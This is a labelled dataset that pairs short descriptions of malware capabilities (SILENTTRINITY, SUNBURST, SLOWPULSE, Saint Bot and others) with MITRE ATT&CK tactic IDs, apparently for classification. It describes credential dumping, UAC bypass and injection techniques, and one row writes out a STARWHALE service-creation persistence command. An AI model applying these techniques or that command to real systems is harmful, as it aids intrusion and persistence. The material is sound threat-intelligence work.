SHARPSTATS has the ability to employ a custom PowerShell script.,['TA0002:Execution']
"SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host.",['TA0007:Discovery']
SHARPSTATS has the ability to identify the domain of the compromised host.,['TA0007:Discovery']
SHARPSTATS has the ability to identify the username on the compromised host.,['TA0007:Discovery']
SHARPSTATS has the ability to identify the current date and time on the compromised host.,['TA0007:Discovery']
SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT30 may have used the SHIPSHAPE malware to move onto air-gapped networks. SHIPSHAPE targets removable drives to spread to other systems by modifying the drive to use Autorun to execute or by hiding legitimate document files and copying an executable to the folder with the same name as the legitimate document.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
SHIPSHAPE achieves persistence by creating a shortcut in the Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SHOTPUT has a command to obtain a directory listing.,['TA0007:Discovery']
SHOTPUT has a command to retrieve information about connected users.,['TA0007:Discovery']
SHOTPUT is obscured using XOR encoding and appended to a valid GIF file.,['TA0005:Defense Evasion']
SHOTPUT has a command to obtain a process listing.,['TA0007:Discovery']
"SHOTPUT has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.",['TA0007:Discovery']
SHOTPUT uses netstat to list TCP connection status.,['TA0007:Discovery']
SHUTTERSPEED can download and execute an arbitary executable.,['TA0011:Command and Control']
SHUTTERSPEED can capture screenshots.,['TA0009:Collection']
SHUTTERSPEED can collect system information.,['TA0007:Discovery']
SILENTTRINITY can enumerate the active Window during keylogging through execution of `GetActiveWindowTitle`.,['TA0007:Discovery']
"SILENTTRINITY contains a number of modules that can bypass UAC, including through Window's Device Manager, Manage Optional Features, and an image hijack on the `.msc` file extension.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SILENTTRINITY can conduct an image hijack of an `.msc` file extension as part of its UAC bypass process.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SILENTTRINITY can monitor Clipboard text and can use `System.Windows.Forms.Clipboard.GetText` to collect data from the clipboard.,['TA0009:Collection']
SILENTTRINITY can insert malicious shellcode into Excel.exe using a `Microsoft.Office.Interop` object.,['TA0002:Execution']
SILENTTRINITY can add a CLSID key for payload execution through `Registry.CurrentUser.CreateSubKey`.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SILENTTRINITY can collect clear text web credentials for Internet Explorer/Edge.,['TA0006:Credential Access']
SILENTTRINITY's `amsiPatch.py` module can disable Antimalware Scan Interface functions.,['TA0005:Defense Evasion']
SILENTTRINITY can use `System` namespace methods to execute lateral movement using DCOM.,['TA0008:Lateral Movement']
SILENTTRINITY can use `System.Security.AccessControl` namespaces to retrieve domain user information.,['TA0007:Discovery']
SILENTTRINITY can use `System.DirectoryServices` namespace to retrieve domain group information.,['TA0007:Discovery']
SILENTTRINITY can downgrade NTLM to capture NTLM hashes.,['TA0005:Defense Evasion']
SILENTTRINITY can transfer files from an infected host to the C2 server.,['TA0010:Exfiltration']
SILENTTRINITY can remove files from the compromised host.,['TA0005:Defense Evasion']
"SILENTTRINITY has several modules, such as `ls.py`, `pwd.py`, and `recentFiles.py`, to enumerate directories and files.",['TA0007:Discovery']
SILENTTRINITY's `credphisher.py` module can prompt a current user for their credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
SILENTTRINITY has a module that can extract cached GPP passwords.,['TA0006:Credential Access']
SILENTTRINITY has the ability to set its window state to hidden.,['TA0005:Defense Evasion']
SILENTTRINITY can bypass ScriptBlock logging to execute unmanaged PowerShell code from memory.,['TA0005:Defense Evasion']
"SILENTTRINITY can remove artifacts from the compromised host, including created Registry keys.",['TA0005:Defense Evasion']
"SILENTTRINITY can load additional files and tools, including Mimikatz.",['TA0011:Command and Control']
SILENTTRINITY contains a module to conduct Kerberoasting.,['TA0006:Credential Access']
SILENTTRINITY has a keylogging capability.,"['TA0009:Collection', 'TA0006:Credential Access']"
SILENTTRINITY can create a memory dump of LSASS via the `MiniDumpWriteDump Win32` API call.,['TA0006:Credential Access']
SILENTTRINITY can obtain a list of local groups and members.,['TA0007:Discovery']
SILENTTRINITY can make tokens from known credentials.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SILENTTRINITY can create a backdoor in KeePass using a malicious config file and in TortoiseSVN using a registry hook.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
"SILENTTRINITY can modify registry keys, including to enable or disable Remote Desktop Protocol .",['TA0005:Defense Evasion']
SILENTTRINITY has the ability to leverage API including `GetProcAddress` and `LoadLibrary`.,['TA0002:Execution']
SILENTTRINITY can scan for open ports on a compromised machine.,['TA0007:Discovery']
SILENTTRINITY can enumerate shares on a compromised host.,['TA0007:Discovery']
SILENTTRINITY can use PowerShell to execute commands.,['TA0002:Execution']
"SILENTTRINITY can enumerate processes, including properties to determine if they have the Common Language Runtime loaded.",['TA0007:Discovery']
SILENTTRINITY can inject shellcode directly into Excel.exe or a specific process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SILENTTRINITY is written in Python and can use multiple Python scripts for execution on targeted systems.,['TA0002:Execution']
"SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated` and `HKLM\Software\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives.",['TA0007:Discovery']
SILENTTRINITY can run a .NET executable within the memory of a sacrificial process by loading the CLR.,['TA0005:Defense Evasion']
SILENTTRINITY can establish a LNK file in the startup folder for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SILENTTRINITY can enumerate and collect the properties of domain computers.,['TA0007:Discovery']
SILENTTRINITY can take a screenshot of the current desktop.,['TA0009:Collection']
SILENTTRINITY can determine if an anti-virus product is installed through the resolution of the service's virtual SID.,['TA0007:Discovery']
"SILENTTRINITY can collect information related to a compromised host, including OS version and a list of drives.",['TA0007:Discovery']
SILENTTRINITY can gather a list of logged on users.,['TA0007:Discovery']
SILENTTRINITY can search for modifiable services that could be used for privilege escalation.,['TA0007:Discovery']
SILENTTRINITY can collect start time information from a compromised host.,['TA0007:Discovery']
SILENTTRINITY can find a process owned by a specific user and impersonate the associated token.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SILENTTRINITY can use `cmd.exe` to enable lateral movement using DCOM.,['TA0002:Execution']
SILENTTRINITY can gather Windows Vault credentials.,['TA0006:Credential Access']
SILENTTRINITY can use WMI for lateral movement.,['TA0002:Execution']
SILENTTRINITY can create a WMI Event to execute a payload for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SILENTTRINITY tracks `TrustedHosts` and can move laterally to these targets via WinRM.,['TA0008:Lateral Movement']
SILENTTRINITY can establish persistence by creating a new service.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SLIGHTPULSE contains functionality to execute arbitrary commands passed to it.,['TA0002:Execution']
SLIGHTPULSE can read files specified on the local system.,['TA0009:Collection']
SLIGHTPULSE can deobfuscate base64 encoded and RC4 encrypted C2 messages.,['TA0005:Defense Evasion']
RAPIDPULSE can transfer files to and from compromised hosts.,['TA0011:Command and Control']
SLIGHTPULSE has piped the output from executed commands to `/tmp/1`.,['TA0009:Collection']
SLIGHTPULSE can base64 encode all incoming and outgoing C2 messages.,['TA0011:Command and Control']
SLIGHTPULSE can RC4 encrypt all incoming and outgoing C2 messages.,['TA0011:Command and Control']
SLIGHTPULSE has the ability to process HTTP GET requests as a normal web server and to insert logic that will read or write files or execute commands in response to HTTP POST requests.,['TA0011:Command and Control']
"SLIGHTPULSE is a web shell that can read, write, and execute files on compromised servers.",['TA0003:Persistence']
SLOTHFULMEDIA has hashed a string containing system information prior to exfiltration via POST requests.,['TA0011:Command and Control']
SLOTHFULMEDIA has uploaded files and information from victim machines.,['TA0009:Collection']
SLOTHFULMEDIA has sent system information to a C2 server via HTTP and HTTPS POST requests.,['TA0010:Exfiltration']
SLOTHFULMEDIA has deleted itself and the 'index.dat' file on a compromised machine to remove recent Internet history from the system.,['TA0005:Defense Evasion']
SLOTHFULMEDIA can enumerate files and directories.,['TA0007:Discovery']
SLOTHFULMEDIA has been created with a hidden attribute to insure it's not visible to the victim.,['TA0005:Defense Evasion']
SLOTHFULMEDIA has downloaded files onto a victim machine.,['TA0011:Command and Control']
SLOTHFULMEDIA has a keylogging capability.,"['TA0009:Collection', 'TA0006:Credential Access']"
"SLOTHFULMEDIA has named a service it establishes on victim machines as ""TaskFrame"" to hide its malicious purpose.",['TA0005:Defense Evasion']
"SLOTHFULMEDIA has mimicked the names of known executables, such as mediaplayer.exe.",['TA0005:Defense Evasion']
"SLOTHFULMEDIA can add, modify, and/or delete registry keys. It has changed the proxy configuration of a victim system by modifying the HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap registry.",['TA0005:Defense Evasion']
"SLOTHFULMEDIA has enumerated processes by ID, name, or privileges.",['TA0007:Discovery']
SLOTHFULMEDIA can inject into running processes on a compromised host.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"SLOTHFULMEDIA has taken a screenshot of a victim's desktop, named it ""Filter3.jpg"", and stored it in the local directory.",['TA0009:Collection']
SLOTHFULMEDIA has the capability to start services.,['TA0002:Execution']
SLOTHFULMEDIA has the capability to stop processes and services.,['TA0040:Impact']
"SLOTHFULMEDIA has collected system name, OS version, adapter information, memory usage, and disk information from a victim machine.",['TA0007:Discovery']
SLOTHFULMEDIA can enumerate open ports on a victim machine.,['TA0007:Discovery']
SLOTHFULMEDIA has collected the username from a victim machine.,['TA0007:Discovery']
SLOTHFULMEDIA has the capability to enumerate services.,['TA0007:Discovery']
SLOTHFULMEDIA has used HTTP and HTTPS for C2 communications.,['TA0011:Command and Control']
SLOTHFULMEDIA can open a command line to execute commands.,['TA0002:Execution']
"SLOTHFULMEDIA has created a service on victim machines named ""TaskFrame"" to establish persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SLOWDRIFT uses cloud based services for C2.,['TA0011:Command and Control']
SLOWDRIFT downloads additional payloads.,['TA0011:Command and Control']
SLOWDRIFT collects and sends system information to its C2.,['TA0007:Discovery']
SLOWPULSE is applied in compromised environments through modifications to legitimate Pulse Secure files.,['TA0003:Persistence']
"SLOWPULSE can write logged ACE credentials to `/home/perl/PAUS.pm` in append mode, using the format string `%s:%s\n`.",['TA0009:Collection']
SLOWPULSE can insert malicious logic to bypass RADIUS and ACE two factor authentication flows if a designated attacker-supplied password is provided.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
SLOWPULSE can log credentials on compromised Pulse Secure VPNs during the `DSAuth::AceAuthServer::checkUsernamePassword`ACE-2FA authentication procedure.,['TA0006:Credential Access']
SLOWPULSE can modify LDAP and two factor authentication flows by inspecting login credentials and forcing successful authentication if the provided password matches a chosen backdoor password.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
SLOWPULSE can hide malicious code in the padding regions between legitimate functions in the Pulse Secure `libdsplibs.so` file.,['TA0005:Defense Evasion']
SMOKEDHAM has added user accounts to local Admin groups.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SMOKEDHAM has used a fronted domain to obfuscate its hard-coded C2 server domain.,['TA0011:Command and Control']
The SMOKEDHAM source code is embedded in the dropper as an encrypted string.,['TA0005:Defense Evasion']
SMOKEDHAM has exfiltrated data to its C2 server.,['TA0010:Exfiltration']
SMOKEDHAM has modified the Registry to hide created user accounts from the Windows logon screen.,['TA0005:Defense Evasion']
SMOKEDHAM has used Powershell to download UltraVNC and ngrok from third-party file sharing sites.,['TA0011:Command and Control']
SMOKEDHAM can continuously capture keystrokes.,"['TA0009:Collection', 'TA0006:Credential Access']"
SMOKEDHAM has used net.exe user and net.exe users to enumerate local accounts on a compromised host.,['TA0007:Discovery']
SMOKEDHAM has created user accounts.,['TA0003:Persistence']
SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing.,['TA0002:Execution']
"SMOKEDHAM has modified registry keys for persistence, to enable credential caching for credential access, and to facilitate lateral movement via RDP.",['TA0005:Defense Evasion']
SMOKEDHAM can execute Powershell commands sent from its C2 server.,['TA0002:Execution']
SMOKEDHAM has used reg.exe to create a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SMOKEDHAM can capture screenshots of the victim’s desktop.,['TA0009:Collection']
SMOKEDHAM has been delivered via malicious links in phishing emails.,['TA0043:Reconnaissance']
SMOKEDHAM has encoded its C2 traffic with Base64.,['TA0011:Command and Control']
SMOKEDHAM has encrypted its C2 traffic with RC4.,['TA0011:Command and Control']
SMOKEDHAM has used the systeminfo command on a compromised host.,['TA0007:Discovery']
SMOKEDHAM has used whoami commands to identify system owners.,['TA0007:Discovery']
SMOKEDHAM has communicated with its C2 servers via HTTPS and HTTP POST requests.,['TA0011:Command and Control']
SMOKEDHAM has used Google Drive and Dropbox to host files downloaded by victims via malicious links.,['TA0011:Command and Control']
SNUGRIDE establishes persistence through a Registry Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SNUGRIDE encrypts C2 traffic using AES with a static key.,['TA0011:Command and Control']
SNUGRIDE communicates with its C2 server over HTTP.,['TA0011:Command and Control']
SNUGRIDE is capable of executing commands and spawning a reverse shell.,['TA0002:Execution']
SOUNDBITE is capable of enumerating application windows.,['TA0007:Discovery']
SOUNDBITE communicates via DNS for C2.,['TA0011:Command and Control']
SOUNDBITE is capable of enumerating and manipulating files and directories.,['TA0007:Discovery']
SOUNDBITE is capable of modifying the Registry.,['TA0005:Defense Evasion']
SOUNDBITE is capable of gathering system information.,['TA0007:Discovery']
Data SPACESHIP copies to the staging area is compressed with zlib. Bytes are rotated by four positions and XOR'ed with 0x23.,['TA0009:Collection']
SPACESHIP copies staged data to removable drives when they are inserted into the system.,['TA0010:Exfiltration']
SPACESHIP identifies files and directories for collection by searching for specific file extensions or file modification time.,['TA0007:Discovery']
SPACESHIP identifies files with certain extensions and copies them to a directory in the user's profile.,['TA0009:Collection']
SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SPACESHIP achieves persistence by creating a shortcut in the current user's Startup folder.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"SQLRat has used a character insertion obfuscation technique, making the script appear to contain Chinese characters.",['TA0005:Defense Evasion']
SQLRat has scripts that are responsible for deobfuscating additional scripts.,['TA0005:Defense Evasion']
SQLRat has used been observed deleting scripts once used.,['TA0005:Defense Evasion']
"SQLRat can make a direct SQL connection to a Microsoft database controlled by the attackers, retrieve an item from the bindata table, then write and execute the file on disk.",['TA0011:Command and Control']
SQLRat relies on users clicking on an embedded image to execute the scripts.,['TA0002:Execution']
SQLRat has used PowerShell to create a Meterpreter session.,['TA0002:Execution']
SQLRat has created scheduled tasks in %appdata%\Roaming\Microsoft\Templates\.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SQLRat has used SQL to execute JavaScript and VB scripts on the host system.,['TA0002:Execution']
STARWHALE can collect data from an infected local host.,['TA0009:Collection']
STARWHALE has been obfuscated with hex-encoded strings.,['TA0005:Defense Evasion']
STARWHALE can exfiltrate collected data to its C2 servers.,['TA0010:Exfiltration']
STARWHALE has stored collected data in a file called `stari.txt`.,['TA0009:Collection']
STARWHALE has relied on victims opening a malicious Excel file for execution.,['TA0002:Execution']
"STARWHALE can establish persistence by installing itself in the startup folder, whereas the GO variant has created a `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OutlookM` registry key.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
STARWHALE has the ability to hex-encode collected data from an infected host.,['TA0011:Command and Control']
STARWHALE can gather the computer name of an infected host.,['TA0007:Discovery']
STARWHALE has the ability to collect the IP address of an infected host.,['TA0007:Discovery']
STARWHALE can gather the username from an infected host.,['TA0007:Discovery']
STARWHALE can use the VBScript function `GetRef` as part of its persistence mechanism.,['TA0002:Execution']
STARWHALE has the ability to contact actor-controlled C2 servers via HTTP.,['TA0011:Command and Control']
STARWHALE has the ability to execute commands via `cmd.exe`.,['TA0002:Execution']
"STARWHALE has the ability to create the following Windows service to establish persistence on an infected host: `sc create Windowscarpstss binpath= ""cmd.exe /c cscript.exe c:\\windows\\system32\\w7_1.wsf humpback_whale"" start= ""auto"" obj= ""LocalSystem""`.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
STEADYPULSE can URL decode key/value pairs sent over C2.,['TA0005:Defense Evasion']
STEADYPULSE can add lines to a Perl script on a targeted server to import additional Perl modules.,['TA0011:Command and Control']
STEADYPULSE can transmit URL encoded data over C2.,['TA0011:Command and Control']
STEADYPULSE can parse web requests made to a targeted server to determine the next stage of execution.,['TA0011:Command and Control']
STEADYPULSE is a web shell that can enable the execution of arbitrary commands on compromised web servers.,['TA0003:Persistence']
SUGARDUMP has encrypted collected data using AES CBC mode and encoded it using Base64.,['TA0009:Collection']
SUGARDUMP has collected browser bookmark and history information.,['TA0007:Discovery']
"SUGARDUMP variants have harvested credentials from browsers such as Firefox, Chrome, Opera, and Edge.",['TA0006:Credential Access']
SUGARDUMP has sent stolen credentials and other data to its C2 server.,['TA0010:Exfiltration']
"SUGARDUMP can search for and collect data from specific Chrome, Opera, Microsoft Edge, and Firefox files, including any folders that have the string `Profile` in its name.",['TA0007:Discovery']
SUGARDUMP has stored collected data under `%%\\CrashLog.txt`.,['TA0009:Collection']
A SUGARDUMP variant used SMTP for C2.,['TA0011:Command and Control']
Some SUGARDUMP variants required a user to enable a macro within a malicious .xls file for execution.,['TA0002:Execution']
"SUGARDUMP's scheduled task has been named `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` or `MicrosoftEdgeCrashRepoeterTaskMachineUA`, depending on the Windows OS version.",['TA0005:Defense Evasion']
SUGARDUMP has been named `CrashReporter.exe` to appear as a legitimate Mozilla executable.,['TA0005:Defense Evasion']
"SUGARDUMP has created scheduled tasks called `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` and `MicrosoftEdgeCrashRepoeterTaskMachineUA`, which were configured to execute `CrashReporter.exe` during user logon.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host.",['TA0007:Discovery']
A SUGARDUMP variant has used HTTP for C2.,['TA0011:Command and Control']
SUGARUSH has checked for internet connectivity from an infected host before attempting to establish a new TCP connection.,['TA0007:Discovery']
SUGARUSH has used TCP for C2.,['TA0011:Command and Control']
SUGARUSH has used port 4585 for a TCP connection to its C2.,['TA0011:Command and Control']
SUGARUSH has used `cmd` for execution on an infected host.,['TA0002:Execution']
SUGARUSH has created a service named `Service1` for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SUNBURST also removed the firewall rules it created during execution.,['TA0005:Defense Evasion']
SUNBURST removed IFEO registry values to clean up traces of persistence.,['TA0005:Defense Evasion']
SUNBURST was digitally signed by SolarWinds from March - May 2020.,['TA0005:Defense Evasion']
SUNBURST used DNS for C2 traffic designed to mimic normal SolarWinds API communications.,['TA0011:Command and Control']
SUNBURST collected information from a compromised host.,['TA0009:Collection']
SUNBURST attempted to disable software security services following checks against a FNV-1a + XOR hashed hardcoded blocklist.,['TA0005:Defense Evasion']
SUNBURST dynamically resolved C2 infrastructure for randomly-generated subdomains within a parent domain.,['TA0011:Command and Control']
SUNBURST had a command to delete files.,['TA0005:Defense Evasion']
SUNBURST had commands to enumerate files and directories.,['TA0007:Discovery']
SUNBURST created an Image File Execution Options Debugger registry value for the process dllhost.exe to trigger the installation of Cobalt Strike.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SUNBURST removed HTTP proxy registry values to clean up traces of execution.,['TA0005:Defense Evasion']
"SUNBURST source code used generic variable names and pre-obfuscated strings, and was likely sanitized of developer comments before being added to SUNSPOT.",['TA0005:Defense Evasion']
"SUNBURST delivered different payloads, including TEARDROP in at least one instance.",['TA0011:Command and Control']
SUNBURST added junk bytes to its C2 over HTTP.,['TA0011:Command and Control']
SUNBURST created VBScripts that were named after existing services or folders to blend into legitimate activities.,['TA0005:Defense Evasion']
"SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their HKLM\SYSTEM\CurrentControlSet\services\\service_name\\Start registry entries to value 4. It also deleted previously-created Image File Execution Options Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity.",['TA0005:Defense Evasion']
SUNBURST strings were compressed and encoded in Base64. SUNBURST also obfuscated collected system information using a FNV-1a + XOR algorithm.,['TA0005:Defense Evasion']
SUNBURST collected a list of process names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.,['TA0007:Discovery']
SUNBURST masqueraded its network traffic as the Orion Improvement Program protocol.,['TA0011:Command and Control']
SUNBURST collected the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid from compromised hosts.,['TA0007:Discovery']
SUNBURST used Rundll32 to execute payloads.,['TA0005:Defense Evasion']
SUNBURST checked for a variety of antivirus/endpoint detection agents prior to execution.,['TA0007:Discovery']
SUNBURST used Base64 encoding in its C2 traffic.,['TA0011:Command and Control']
SUNBURST C2 data attempted to appear as benign XML related to .NET assemblies or as a faux JSON blob.,['TA0011:Command and Control']
SUNBURST encrypted C2 traffic using a single-byte-XOR cipher.,['TA0011:Command and Control']
SUNBURST checked the domain name of the compromised host to verify it was running in a real environment.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
SUNBURST collected hostname and OS version.,['TA0007:Discovery']
"SUNBURST collected all network interface MAC addresses that are up and not loopback devices, as well as IP address, DHCP configuration, and domain information.",['TA0007:Discovery']
SUNBURST collected the username from a compromised host.,['TA0007:Discovery']
SUNBURST collected a list of service names that were hashed using a FNV-1a + XOR algorithm to check against similarly-hashed hardcoded blocklists.,['TA0007:Discovery']
SUNBURST collected device `UPTIME`.,['TA0007:Discovery']
SUNBURST remained dormant after initial access for a period of up to two weeks.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
SUNBURST used VBScripts to initiate the execution of payloads.,['TA0002:Execution']
SUNBURST communicated via HTTP GET or HTTP POST requests to third party servers for C2.,['TA0011:Command and Control']
SUNBURST used the WMI query Select * From Win32_SystemDriver to retrieve a driver listing.,['TA0002:Execution']
SUNSPOT modified its security token to grants itself debugging privileges by adding SeDebugPrivilege.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product.,['TA0001:Initial Access']
"SUNSPOT decrypts SUNBURST, which was stored in AES128-CBC encrypted blobs.",['TA0005:Defense Evasion']
SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values.,['TA0005:Defense Evasion']
"Following the successful injection of SUNBURST, SUNSPOT deleted a temporary file it created named InventoryManager.bk after restoring the original SolarWinds Orion source code to the software library.",['TA0005:Defense Evasion']
SUNSPOT enumerated the Orion software Visual Studio solution directory path.,['TA0007:Discovery']
SUNSPOT was identified on disk with a filename of taskhostsvc.exe and it created an encrypted log file at C:\Windows\Temp\vmware-vmdmp.log.,['TA0005:Defense Evasion']
SUNSPOT creates a mutex using the hard-coded value ` {12d61a41-4b74-7610-a4d8-3028d2f56395}` to ensure that only one instance of itself is running.,['TA0005:Defense Evasion']
SUNSPOT used Windows API functions such as MoveFileEx and NtQueryInformationProcess as part of the SUNBURST injection process.,['TA0002:Execution']
SUNSPOT encrypted log entries it collected with the stream cipher RC4 using a hard-coded key. It also uses AES128-CBC encrypted blobs for SUNBURST source code and data extracted from the SolarWinds Orion process.,['TA0005:Defense Evasion']
SUNSPOT monitored running processes for instances of MsBuild.exe by hashing the name of each running process and comparing it to the corresponding value 0x53D525. It also extracted command-line arguments and individual arguments from the running MsBuild.exe process to identify the directory path of the Orion software Visual Studio solution.,['TA0007:Discovery']
"SUNSPOT created a copy of the SolarWinds Orion software source file with a .bk extension to backup the original content, wrote SUNBURST using the same filename but with a .tmp extension, and then moved SUNBURST using MoveFileEx to the original filename with a .cs extension so it could be compiled within Orion software.",['TA0040:Impact']
SUPERNOVA contained Base64-encoded strings.,['TA0005:Defense Evasion']
SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability .,['TA0002:Execution']
SUPERNOVA has masqueraded as a legitimate SolarWinds DLL.,['TA0005:Defense Evasion']
SUPERNOVA had to receive an HTTP GET request containing a specific set of parameters in order to execute.,['TA0011:Command and Control']
SUPERNOVA is a Web shell.,['TA0003:Persistence']
SVCReady has created the `HKEY_CURRENT_USER\Software\Classes\CLSID\{E6D34FFC-AD32-4d6a-934C-D387FA873A19}` Registry key for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
SVCReady can collect data from an infected host.,['TA0009:Collection']
SVCReady can send collected data in JSON format to its C2 server.,['TA0010:Exfiltration']
SVCReady has the ability to download additional tools such as the RedLine Stealer to an infected host.,['TA0011:Command and Control']
SVCReady has relied on users clicking a malicious attachment delivered through spearphishing.,['TA0002:Execution']
SVCReady has named a task `RecoveryExTask` as part of its persistence activity.,['TA0005:Defense Evasion']
SVCReady can use Windows API calls to gather information from an infected host.,['TA0002:Execution']
SVCReady can encrypt victim data with an RC4 cipher.,['TA0005:Defense Evasion']
SVCReady can check for the number of devices plugged into an infected host.,['TA0007:Discovery']
SVCReady can collect a list of running processes from an infected host.,['TA0007:Discovery']
SVCReady can search for the `HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System` Registry key to gather system information.,['TA0007:Discovery']
SVCReady has used `rundll32.exe` for execution.,['TA0005:Defense Evasion']
SVCReady can create a scheduled task named `RecoveryExTask` to gain persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SVCReady can take a screenshot from an infected host.,['TA0009:Collection']
SVCReady can collect a list of installed software from an infected host.,['TA0007:Discovery']
SVCReady has been distributed via spearphishing campaigns containing malicious Mircrosoft Word documents.,['TA0001:Initial Access']
SVCReady has the ability to determine if its runtime environment is virtualized.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"SVCReady has the ability to collect information such as computer name, computer manufacturer, BIOS, operating system, and firmware, including through the use of `systeminfo.exe`.",['TA0007:Discovery']
SVCReady can collect the username from an infected host.,['TA0007:Discovery']
SVCReady can collect time zone information.,['TA0007:Discovery']
SVCReady can enter a sleep stage for 30 minutes to evade detection.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
SVCReady has used VBA macros to execute shellcode.,['TA0002:Execution']
SVCReady can communicate with its C2 servers via HTTP.,['TA0011:Command and Control']
SVCReady can use `WMI` queries to detect the presence of a virtual machine environment.,['TA0002:Execution']
SYNful Knock has the capability to add its own custom backdoor password when it modifies the operating system of the affected network device.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
SYNful Knock is malware that is inserted into a network device by patching the operating system image.,['TA0005:Defense Evasion']
SYNful Knock can be sent instructions via special packets to change its functionality. Code for new functionality can be included in these messages.,"['TA0011:Command and Control', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
SYSCON has the ability to use FTP in C2 communications.,['TA0011:Command and Control']
SYSCON has been executed by luring victims to open malicious e-mail attachments.,['TA0002:Execution']
SYSCON has the ability to use Tasklist to list running processes.,['TA0007:Discovery']
SYSCON has the ability to use Systeminfo to identify system information.,['TA0007:Discovery']
SYSCON has the ability to execute commands through cmd on a compromised host.,['TA0002:Execution']
Saint Bot has written its payload into a newly-created `EhStorAuthn.exe` process using `ZwWriteVirtualMemory` and executed it using `NtQueueApcThread` and `ZwAlertResumeThread`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Saint Bot has attempted to bypass UAC using `fodhelper.exe` to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Saint Bot can collect files and information from a compromised host.,['TA0009:Collection']
Saint Bot has used `is_debugger_present` as part of its environmental checks.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Saint Bot can deobfuscate strings and files for execution.,['TA0005:Defense Evasion']
Saint Bot has injected its DLL component into `EhStorAurhn.exe`.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Saint Bot can run a batch script named `del.bat` to remove any Saint Bot payload-linked files from a compromise system if anti-analysis or locale checks fail.,['TA0005:Defense Evasion']
Saint Bot can search a compromised host for specific files.,['TA0007:Discovery']
Saint Bot will use the malicious file slideshow.mp4 if present to load the core API provided by ntdll.dll to avoid any hooks placed on calls to the original ntdll.dll file by endpoint detection and response or antimalware software.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Saint Bot can download additional files onto a compromised host.,['TA0011:Command and Control']
Saint Bot had used `InstallUtil.exe` to download and deploy executables.,['TA0005:Defense Evasion']
Saint Bot has relied on users to execute a malicious attachment delivered via spearphishing.,['TA0002:Execution']
Saint Bot has relied on users to click on a malicious link delivered via a spearphishing.,['TA0002:Execution']
Saint Bot has renamed malicious binaries as `wallpaper.mp4` and `slideshow.mp4` to avoid detection.,['TA0005:Defense Evasion']
"Saint Bot has been disguised as a legitimate executable, including as Windows SDK.",['TA0005:Defense Evasion']
"Saint Bot has used different API calls, including `GetProcAddress`, `VirtualAllocEx`, `WriteProcessMemory`, `CreateProcessA`, and `SetThreadContext`.",['TA0002:Execution']
Saint Bot has been obfuscated to help avoid detection.,['TA0005:Defense Evasion']
